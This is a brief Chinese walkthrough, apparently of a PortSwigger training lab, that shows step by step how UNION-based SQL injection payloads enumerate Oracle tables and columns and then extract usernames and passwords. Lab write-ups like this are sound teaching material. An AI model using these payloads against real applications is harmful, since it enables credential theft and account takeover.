对于oracle数据库

'+UNION+SELECT+table_name,NULL+FROM+all_tables--

btw,如果是非oracle数据的库

'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

获取了table name,这几个users table 看起来像吗?

接下来试着查下这几个表的column

'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USER'--

啥也没读出来。。。。

然后换一个,MEXYAA,读出来,这两个看起来像账号密码的column name

接下来读administrator吧

这两个列

PASSWORD_IURFRJ

USERNAME_YPUOMR

'+UNION+SELECT+USERNAME_YPUOMR,+PASSWORD_IURFRJ+FROM+USERS_MEXYAA--

然后当然是。。。

reference

SQLi lab: Equivalent to information schema on Oracle相关推荐

  1. 对话腾讯AI Lab:即将开源自动化模型压缩框架PocketFlow,加速效果可达50%

    整理 | Jane 出品 | AI科技大本营 [导语]腾讯 AI Lab 机器学习中心今日宣布成功研发出世界上首款自动化深度学习模型压缩框架--PocketFlow,并即将在今年10-11月发布开源代 ...

  2. 论文笔记:HIE-SQL:History Information Enhanced Network for Context-Dependent Text-to-SQL Semantic Parsing

    论文笔记:HIE-SQL: History Information Enhanced Network for Context-Dependent Text-to-SQL Semantic Parsin ...

  3. ML与Information:机器学习与Information信息论之间那些七七八八、乱七八糟、剪不断理还乱的关系攻略

    ML与Information:机器学习与Information信息论之间那些七七八八.乱七八糟.剪不断理还乱的关系攻略 目录 ML与信息论 ML与熵 1.熵的基础知识 2.熵与分布的关系 3.最大熵模 ...

  4. CSAPP Lab:attacklab

    大小尾端 首先关于这个,我一直没记清楚,所以做个总结: 在裘宗燕翻译的<程序设计实践>里,这对术语并没有翻译为"大端"和小端,而是"高尾端"和&qu ...

  5. 【MCU】MDK错误:No Browse Information available in ‘..\OBJ\SPI‘

    MDK错误:No Browse Information available in '..\OBJ\SPI' 1. 问题描述 No Browse Information available in '.. ...

  6. MDK报错:NO BROWSE INFORMATION AVAILABLE IN...

    MDK错误:NO BROWSE INFORMATION AVAILABLE IN -- 1. 问题描述 2. 解决方法 1. 打开魔术棒 2. 选择 Output,勾选 Browse Informat ...

  7. oracle xdb插件报错,注册XML Schema到ORACLE XDB并对XML进行验证

    注册XML Schema到ORACLE XDB可以方便生成XML的验证. What is an XML Schema? An XML Schema is a language for expressi ...

  8. schema在oracle里是什么意思

    在现在做的Kraft Catalyst 项目中,Cransoft其中有一个功能就是schema refresh. 一直不理解schema什么意思,也曾经和同事讨论过,当时同事就给我举过一个例子,下面会 ...

  9. GoldenGate配置实例:RHEL 4.7下的Oracle 10g RAC到单实例的单向同步(一)

    环境 源端是一个RAC rac1 rac2: RHEL 4u7 + ORACLE 10.2.0.4 + ASM rac1 外网IP 192.168.47.241 虚拟IP 192.168.47.243 ...

最新文章

  1. java程序通过命令行运行之Path和ClassPath的注意点
  2. 方式四:修改模块导入段来拦截API
  3. Java实验9 T5. 给当前的类文件添加行号拷贝到txt文件
  4. 极简算法 —— 判断两字符串是否为相同字母的不同顺序组成
  5. 【Altium Designer2018设计简单的PCB文件实例】
  6. 麻瓜编程python爬虫微专业_网易微专业麻瓜编程Python Web开发工程师教程
  7. CMake file命令参数GLOB和GLOB_RECURSE
  8. Android萤石云视频缩放
  9. supermap制作专题图并发布
  10. 线性代数笔记【空间向量】
  11. 字符串(String)
  12. python绘制等值线图_Python/Matplotlib双线性插值等值线图
  13. 计算机电源已接通但未充电,笔记本电源,详细教您电源已连接未充电怎么解决...
  14. 网络警察 (哈希表)
  15. VLAN的划分方法有哪些?
  16. 基于kingscada的自动绕线机工程,仿真绕线,硕子来回绕线形成线团自动运送到仓库
  17. 硬货|re:Invent 2022 参会指南,大会精华全知晓
  18. Intel和AMD 与 x86,ARM,MIPS有什么区别
  19. 前端小白,了解这3点,不怕找不到工作!
  20. Alien Skin Exposure X4.07汉化版|PS胶片滤镜Exposure X4中文版支持PSCC2019

热门文章

  1. 指针 习题11-1 输出月份英文名
  2. DSPE-PEG-Biotin,CAS:385437-57-0,磷脂-聚乙二醇-生物素可延长循环半衰期
  3. 什么是继承python_面向对象继承
  4. 使用scrapy +selenium爬取动态渲染的页面
  5. librosa.load报错。audioread.NoBackendError
  6. 五年,你敢说自己是高级开发么?
  7. 圆柱体积在线计算机,(完整版)圆柱体积计算练习题.docx
  8. 描述流体中声学物理现象的三个基本方程
  9. 怎样做小程序最省钱,小程序开发平台大盘点
  10. Bus Hound 工具抓取串口数据(PC端抓取USB转串口数据)